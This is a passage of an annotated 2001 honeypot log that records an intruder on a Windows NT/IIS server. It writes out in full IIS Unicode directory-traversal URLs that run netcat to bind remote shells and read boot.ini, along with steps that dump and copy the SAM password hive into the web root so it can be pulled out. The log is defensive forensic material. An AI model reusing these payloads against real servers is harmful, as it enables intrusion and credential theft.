specified logon session does not exist. It may already have been terminated. C:\Program Files\Common Files\System\msadc> 14:05:24 del c Could Not Find C:\Program Files\Common Files\System\msadc\c del samdump.dll del pdump.exe 14:05:40 cd\winnt C:\WINNT> 14:05:44 cd repair C:\WINNT\repair> 14:05:46 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\WINNT\repair 11/26/00 06:43p . 11/26/00 06:43p .. 10/13/96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 11/26/00 06:43p 15,677 default._ 11/26/00 06:43p 14,946 ntuser.da_ 11/26/00 06:43p 4,593 sam._ 11/26/00 06:43p 6,066 security._ 11/26/00 06:54p 50,405 setup.log 11/26/00 06:43p 124,776 software._ 11/26/00 06:43p 80,874 system._ 11 File(s) 300,285 bytes 1,690,922,496 bytes free C:\WINNT\repair> 14:05:51 rdisk -s/ C:\WINNT\repair> rdisk -/s C:\WINNT\repair> 14:06:00 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\WINNT\repair 11/26/00 06:43p . 11/26/00 06:43p .. 10/13:}S /96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 11/26/00 06:43p 15,677 default._ 11/26/00 06:43p 14,946 ntuser.da_ 11/26/00 06:43p 4,593 sam._ 11/26/00 06:43p 6,066 security._ 11/26/00 06:54p 50,405 setup.log 11/26/00 06:43p 124,776 software._ 11/26/00 06:43p 80,874 system._ 11 File(s) 300,285 bytes 1,690,922,496 bytes free C:\WINNT\repair> 14:06:27 rdisk C:\WINNT\repair> rdisk interacts with the desktop! rdisk -s dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\WINNT\repair 11/26/00 06:43p . 11/26/00 06:43p .. 10/13/96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 11/26/00 06:43p 15,677 default._ 11/26/00 06:43p 14,946 ntuser.da_ 11/26/00 06:43p 4,593 sam._ 11/26/00 06:43p 6,066 security._ 11/26/00 06:54p 50,405 setup.log 11/26/00 06:43p 124,776 software._ 11/26/00 06:43p 80,874 system._ 11 File(s) 300,285 bytes 1,690,922,496 bytes free C:\WINNT\repair> cat The name specified is not recognized as an internal or external command, operable program or batch file. C:\WINNT\repair> type sam._ Access is denied. C:\WINNT\repair> 14:06:27 RDS rdisk -/s 14:06:38 RDS rdisk -s 14:06:42 RDS rdisk 14:06:44 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\WINNT\repair 02/04/01 07:05a . 02/04/01 07:05a .. 02/04:}S /01 07:05a 827,392 $$hive$$.tmp 10/13/96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 11/26/00 06:43p 15,677 default._ 11/26/00 06:43p 14,946 ntuser.da_ 11/26/00 06:43p 4,593 sam._ 11/26/00 06:43p 6,066 security._ 11/26/00 06:54p 50,405 setup.log 11/26/00 06:43p 124,776 software._ 11 File(s) 1,046,803 bytes 1,690,111,488 bytes free C:\WINNT\repair> 14:06:47 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\WINNT\repair 02/04/01 07:05a . 02/04/01 07:05a .. 02/04/01 07:05a 827,392 $$hive$$.tmp 10/13/96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 11/26/00 06:43p 15,677 default._ 11/26/00 06:43p 14,946 ntuser.da_ 11/26/00 06:43p 4,593 sam._ 11/26/00 06:43p 6,066 security._ 11/26/00 06:54p 50,405 setup.log 11/26/00 06:43p 124,776 software._ 11 File(s) 1,046,803 bytes 1,690,095,104 bytes free C:\WINNT\repair> 14:06:51 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\WINNT\repair 02/04/01 07:05a . 02/04/01 07:05a .. 02/04/01 07:05a 827,392 $$hive$$.tmp 10/13/96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 11/26/00 06:43p 15,677 default._ 11/26/00 06:43p 14,946 ntuser.da_ 11/26/00 06:43p 4,593 sam._ 11/26/00 06:43p 6,066 security._ 11/26/00 06:54p 50,405 setup.log 11/26/00 06:43p 124,776 software._ 11 File(s) 1,046,803 bytes 1,690,060,288 bytes free C:\WINNT\repair> 14:07:00 RDS rdisk -s/ 14:07:10 RDS rdisk -s/ 14:07:32 RDS rdisk /s- 14:07:34 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\WINNT\repair 02/04/01 07:06a . 02/04/01 07:06a .. 02/04/01 07:05a 3,469,312 $$hive$$.tmp 10/13/96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 11/26/00 06:43p 15,677 default._ 02/04/01 07:06a 14,946 ntuser.da_ 11/26/00 06:43p 4,593 sam._ 11/26/00 06:43p 6,066 security._ 11/26/00 06:54p 50,405 setup.log 02/04/01 07:05a 177,732 system._ 11 File(s) 3,741,679 bytes 1,687,127,552 bytes free C:\WINNT\repair> 14:07:38 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\WINNT\repair 02/04/01 07:06a . 02/04/01 07:06a .. 02/04/01 07:05a 3,469,312 $$hive$$.tmp 10/13/96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 11/26/00 06:43p 15,677 default._ 11/26/00 06:43p 4,593 sam._ 11/26/00 06:43p 6,066 security._ 11/26/00 06:54p 50,405 setup.log 02/04/01 07:05a 177,732 system._ 10 File(s) 3,726,733 bytes 1,687,082,496 bytes free C:\WINNT\repair> 14:07:50 RDS rdisk /s- 14:07:52 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\WINNT\repair 02/04/01 07:06a . 02/04/01 07:06a .. 02/04/01 07:05a 3,469,312 $$hive$$.tmp 10/13/96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 11/26/00 06:43p 15,677 default._ 02/04/01 07:06a 14,946 ntuser.da_ 11/26/00 06:43p 4,593 sam._ 11/26/00 06:43p 6,066 security._ 11/26/00 06:54p 50,405 setup.log 02/04/01 07:05a 177,732 system._ 11 File(s) 3,741,679 bytes 1,686,932,480 bytes free C:\WINNT\repair> 14:07:56 dir Volume Serial Number is 8403-6A0E Directory of C:\WINNT\repair Volume in drive C has no label. 02/04/01 07:06a . 02/04/01 07:06a .. 02/04/01 07:05a 3,469,312 $$hive$$.tmp 10/13/96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 11/26/00 06:43p 15,677 default._ 11/26/00 06:43p 4,593 sam._ 11/26/00 06:43p 6,066 security._ 11/26/00 06:54p 50,405 setup.log 02/04/01 07:05a 177,732 system._ 10 File(s) 3,726,733 bytes 1,686,871,552 bytes free C:\WINNT\repair> 14:08:32 RDS rdisk /s- 14:08:35 RDS type c:\winnt\repair\sam._ >>c:\har.txt 14:08:42 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\WINNT\repair 02/04/01 07:07a . 02/04/01 07:07a .. 02/04/01 07:07a 827,392 $$hive$$.tmp 10/13/96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 02/04/01 07:07a 16,275 default._ 02/04/01 07:07a 14,946 ntuser.da_ 02/04/01 07:07a 5,327 sam._ 02/04/01 07:07a 10,111 security._ 11/26/00 06:54p 50,405 setup.log 02/04/01 07:07a 686,053 software._ 11 File(s) 1,613,457 bytes 1,689,496,576 bytes free C:\WINNT\repair> 14:08:44 cd\ dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 07:05a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 15 File(s) 78,648,918 bytes 1,689,455,616 bytes free C:\> 14:08:51 type har.txt MSCF $$hive$$.tmp ...... afterwards, the shell seems to be unuseable 14:10:42 UNICODE /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe new shell on port 6969 14:11:06 HTTP-Request shows the referer: Referer:.http://linux.unix.or.kr/~uxbbs/cgi-bin/pds.cgi?pds=freedata 14:11:10 HTTP-Request from 213.116.251.162 shows the referer: Referer:.http://www.google.com/search?q=esb.php3&hl=en&lr=&safe=off 14:11:19 UNICODE new shell on port 6968 14:11:24 attacker connects to new shell 14:11:26 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Common Files\system\msadc 02/04/01 07:04a . 02/04/01 07:04a .. 09/25/97 07:41a 596 adcjavas.inc 09/25/97 07:41a 589 adcvbs.inc 04/30/97 11:00p 208,144 cmd1.exe 09/25/97 08:28a 172,816 msadce.dll 09/25/97 08:16a 5,632 msadcer.dll 09/25/97 08:24a 23,312 msadcf.dll 09/25/97 08:24a 91,408 msadco.dll 09/25/97 08:19a 5,120 msadcor.dll 09/26/97 08:19a 42,256 msadcs.dll 02/04/01 06:41a 59,392 nc.exe 10/02/97 07:28a 19,388 readme.txt 13 File(s) 628,653 bytes 1,690,259,968 bytes free C:\Program Files\Common Files\system\msadc> 14:11:29 net session System error 5 has occurred. Access is denied. C:\Program Files\Common Files\system\msadc> 14:11:33 cd\ dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 07:08a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 15 File(s) 78,648,918 bytes 1,690,259,968 bytes free C:\> 14:11:40 del yay.txt C:\yay.txt The process cannot access the file because it is being used by another process. C:\> >>> pdump.exe is still running and accesses yay.txt 14:11:47 cd wiretrip dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\wiretrip 12/26/00 07:09p . 12/26/00 07:09p .. 12/26/00 07:04p 15,501 msadc1.pl 12/26/00 07:04p 17,865 msadc2.pl 12/26/00 07:04p 4,425 RFParalyze.c 12/26/00 07:04p 2,269 RFPickaxe.pl 12/26/00 07:05p 7,393 RFPoison.c 12/26/00 07:04p 12,450 RFPoison.zip 12/26/00 07:04p 1,792 RFProwl.c 12/26/00 07:06p 170,372 whisker.tar.gz 12/26/00 07:06p 173,427 whisker.zip 12/26/00 07:05p 25,229 whiskerids.html 12 File(s) 430,723 bytes 1,690,259,968 bytes free C:\wiretrip> 14:11:59 cd .. dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 07:08a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 15 File(s) 78,648,918 bytes 1,690,259,968 bytes free C:\> 14:12:09 cd new folder dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\New Folder 12/26/00 07:10p . 12/26/00 07:10p .. 2 File(s) 0 bytes 1,690,259,968 bytes free C:\New Folder> cd.. cd inetpub dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub 12/07/00 03:30p . 12/07/00 03:30p .. 11/26/00 12:40p ftproot 11/26/00 12:40p gophroot 12/07/00 03:31p iissamples 11/26/00 12:40p scripts 12/15/00 08:56p wwwroot 7 File(s) 0 bytes 1,690,259,968 bytes free C:\InetPub> 14:12:19 cd wwwroot dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 12/15/00 08:56p . 12/15/00 08:56p .. /07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 23 File(s) 42,748 bytes 1,690,259,968 bytes free C:\InetPub\wwwroot> 14:12:25 copy c:\har.txt 1 file(s) copied. C:\InetPub\wwwroot> 14:12:32 HTTP-request for the said copy of har.txt 14:14:27 del har.txt dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:11a . 02/04/01 07:11a .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 02/04/01 07:07a 5,327 har.txt 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 24 File(s) 48,075 bytes 1,690,254,336 bytes free C:\InetPub\wwwroot> >>> har.txt still there dir again 14:14:36 del har.txt C:\InetPub\wwwroot\har.txt Access is denied. C:\InetPub\wwwroot> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:11a . 02/04/01 07:11a .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 02/04/01 07:07a 5,327 har.txt 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 24 File(s) 48,075 bytes 1,690,254,336 bytes free C:\InetPub\wwwroot> 14:14:53 del har.txt C:\InetPub\wwwroot\har.txt Access is denied. C:\InetPub\wwwroot> 14:15:15 RDS del c:\inetpub\wwwroot\har.txt 14:15:26 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:11a . 02/04/01 07:11a .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 02/04/01 07:07a 5,327 har.txt 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 24 File(s) 48,075 bytes 1,690,254,336 bytes free C:\InetPub\wwwroot> >>> har.txt still there 14:15:35 RDS del c:\inetpub\wwwroot\har.txt 14:15:38 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:11a . 02/04/01 07:11a .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 02/04/01 07:07a 5,327 har.txt 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 24 File(s) 48,075 bytes 1,690,254,336 bytes free C:\InetPub\wwwroot> >>> har.txt is still there... 14:15:48 cd guest C:\InetPub\wwwroot\guest> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot\guest 12/15/00 09:15p . 12/15/00 09:15p .. 12/15/00 08:59p 1 12/15/00 09:09p 2 12/15/00 08:59p 3 01/05/01 11:27a 1,829 default.asp 05/07/99 09:14p 200,704 DVMailer.DLL 12/15/00 09:11p 10,017 guestbook.asp 06/15/99 12:17p 18 GuestBook.bot 01/25/01 04:12p 27,843 GuestBook.HTM 01/25/01 04:12p 2,691 GUESTBOOK.LOG 12/15/00 09:22p 413 GuestBook.top 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 06/16/99 10:45a 4,441 Readme 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 06/16/99 08:50a 186 ViewGB.asp 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 25 File(s) 276,406 bytes 1,690,254,336 bytes free C:\InetPub\wwwroot\guest> cd .. C:\InetPub\wwwroot> ...a lot of keyboard trouble... 14:16:16 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 07:14a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 15 File(s) 78,648,918 bytes 1,690,254,336 bytes free C:\> cd temp dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\TEMP 12/21/00 08:59p . 12/21/00 08:59p .. 12/16/00 06:54p 81,920 Arm2.tmp 12/16/00 06:54p 16 E65B8AC0.TMP 12/21/00 08:59p IXP1.tmp 12/20/00 05:12p 7,680 ~DF64D5.tmp 6 File(s) 89,616 bytes 1,690,254,336 bytes free C:\TEMP> 14:17:38 UNICODE GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6968+-e+cmd1.exe HTTP/1.1 new shell bound to port 6968 - already in use?! 14:19:05 UNICODE GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6868+-e+cmd1.exe HTTP/1.1 new shell bound to port 6868 15:20:44.243335 connect from 202.85.60.156 (ip60-156.hksp.net) Hong Kong dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Common Files\System 12/07/00 03:23p . 12/07/00 03:23p .. 12/07/00 03:34p ado 02/04/01 07:04a msadc 12/07/00 03:34p ole db 11/11/97 12:50p 399,120 wab32.dll 6 File(s) 399,120 bytes 1,690,259,968 bytes free C:\Program Files\Common Files\System> cd .. C:\Program Files\Common Files> cd .. C:\Program Files> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files 12/21/00 08:59p . 12/21/00 08:59p .. 12/07/00 03:11p Common Files 12/21/00 08:59p D4 12/07/00 03:23p ICW-Internet Connection Wizard 12/07/00 03:37p Microsoft FrontPage 12/07/00 03:34p Mts 12/07/00 03:23p Outlook Express 11/26/00 06:42p Plus! 12/16/00 06:54p Syslogd 11/26/00 06:56p Windows NT 11 File(s) 0 bytes 1,690,259,968 bytes free C:\Program Files> cd Outlook Express C:\Program Files\Outlook Express> Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Outlook Express 12/07/00 03:23p . 12/07/00 03:23p .. 11/11/97 10:25a 36,176 msimn.exe 10/30/97 10:19p 14,182 msimn.txt 11/11/97 10:25a 97,424 msimnimp.dll 11/11/97 12:50p 1,689,872 msimnui.dll 11/11/97 10:25a 26,144 wab.exe 11/11/97 10:25a 12,464 wabfind.dll 11/11/97 10:25a 106,752 wabimp.dll 11/11/97 10:25a 40,224 wabmig.exe 11/11/97 10:25a 48,624 _isetup.exe 11 File(s) 2,071,862 bytes 1,690,259,968 bytes free C:\Program Files\Outlook Express> cd ../../ C:\Program Files> cd .. C:\> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 07:14a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 15 File(s) 78,648,918 bytes 1,690,259,968 bytes free C:\> type yay.txt C:\> mkdir test C:\> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 07:22a test 02/04/01 07:14a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 16 File(s) 78,648,918 bytes 1,690,259,968 bytes free C:\> type har.txt MSCF $$hive$$.tmp ..... cd exploits C:\exploits> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits 12/26/00 07:36p . 12/26/00 07:36p .. 12/26/00 07:36p microsoft 12/26/00 07:35p newfiles 12/26/00 07:24p unix 5 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits> cd unix C:\exploits\unix> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix 12/26/00 07:24p . 12/26/00 07:24p .. 12/26/00 07:25p sunos-exploits 12/26/00 07:24p tcp-exploits 12/26/00 07:24p trojans 12/26/00 07:16p udp-exploits 12/26/00 07:15p ultrix-exploits 12/26/00 07:15p xwin-exploits 8 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits\unix> cd sunos C:\exploits\unix\sunos-exploits> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix\sunos-exploits 12/26/00 07:25p . 12/26/00 07:25p .. 03/23/98 10:25a 3,209 binmail.sh 03/23/98 10:25a 4,343 chup.c 03/23/98 10:25a 964 kcms.sh 03/23/98 10:25a 1,522 lastlog.c 03/23/98 10:25a 4,988 nittie.c 03/23/98 10:25a 4,622 passwdscript.sh 8 File(s) 19,648 bytes 1,690,259,968 bytes free C:\exploits\unix\sunos-exploits> cd .. C:\exploits\unix> cd .. C:\exploits> 14:25:03 echo best honeypot i've seen till now :) > rfp.txt Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 02/04/01 07:23a 38 rfp.txt 12/21/00 08:59p TEMP 02/04/01 07:22a test 02/04/01 07:15a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 17 File(s) 78,648,956 bytes 1,690,259,968 bytes free C:\> 14:25:49 session #1 UNICODE GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1 [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows NT Server, Enterprise Edition Version 4.00" multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows NT Server, Enterprise Edition Version 4.00 [VGA mode]" /basevideo /sos 14:25:51 session #2 cd exploits C:\exploits> session #1 GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../READ.NOW.hax0r HTTP/1.1 server responds with 404 session #2 cd wiretrip C:\wiretrip> session #1 GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../READ.me.NOW.hax0r HTTP/1.1 server responds 404 session #2 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\wiretrip 12/26/00 07:09p . 12/26/00 07:09p .. 12/26/00 07:04p 15,501 msadc1.pl 12/26/00 07:04p 17,865 msadc2.pl 12/26/00 07:04p 4,425 RFParalyze.c 12/26/00 07:04p 2,269 RFPickaxe.pl 12/26/00 07:05p 7,393 RFPoison.c 12/26/00 07:04p 12,450 RFPoison.zip 12/26/00 07:04p 1,792 RFProwl.c 12/26/00 07:06p 170,372 whisker.tar.gz 12/26/00 07:06p 173,427 whisker.zip 12/26/00 07:05p 25,229 whiskerids.html 12 File(s) 430,723 bytes 1,690,259,968 bytes free C:\wiretrip> cd .. C:\> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 02/04/01 07:23a 38 rfp.txt 12/21/00 08:59p TEMP 02/04/01 07:22a test 02/04/01 07:15a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 17 File(s) 78,648,956 bytes 1,690,259,968 bytes free C:\> cd exploits C:\exploits> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits 12/26/00 07:36p . 12/26/00 07:36p .. 12/26/00 07:36p microsoft 12/26/00 07:35p newfiles 12/26/00 07:24p unix 5 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits> cd newfiles C:\exploits\newfiles> Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\newfiles 12/26/00 07:35p . 12/26/00 07:35p .. 2 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits\newfiles> cd ../unix C:\exploits> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix 12/26/00 07:24p . 12/26/00 07:24p .. 12/26/00 07:25p sunos-exploits 12/26/00 07:24p tcp-exploits 12/26/00 